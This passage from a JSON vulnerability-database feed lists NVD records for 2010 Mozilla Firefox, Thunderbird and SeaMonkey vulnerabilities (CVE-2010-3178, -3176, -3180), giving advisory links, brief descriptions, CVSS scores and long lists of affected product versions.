"http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12120"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3178", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=559344", "http://www.redhat.com/support/errata/RHSA-2010-0781.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=509075", "https://bugzilla.mozilla.org/show_bug.cgi?id=568303", "https://bugzilla.mozilla.org/show_bug.cgi?id=583957", "https://bugzilla.mozilla.org/show_bug.cgi?id=566141", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=568073", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=594760", "http://support.avaya.com/css/P8/documents/100114250", "http://www.securityfocus.com/bid/44243", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "https://bugzilla.mozilla.org/show_bug.cgi?id=580151", "http://support.avaya.com/css/P8/documents/100120156", "http://www.redhat.com/support/errata/RHSA-2010-0780.html", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.5.x before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:02", "title": "CVE-2010-3176", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12132", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12132"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3176"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12132", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12132"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3176", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3176", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://www.redhat.com/support/errata/RHSA-2010-0781.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.securityfocus.com/bid/44248", "http://support.avaya.com/css/P8/documents/100114250", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=588929", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.redhat.com/support/errata/RHSA-2010-0780.html", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Use-after-free vulnerability in the nsBarProp function in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 allows remote attackers to execute arbitrary code by accessing the locationbar property of a closed window.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3180", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12158", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12158"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3180"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12158", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12158"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", 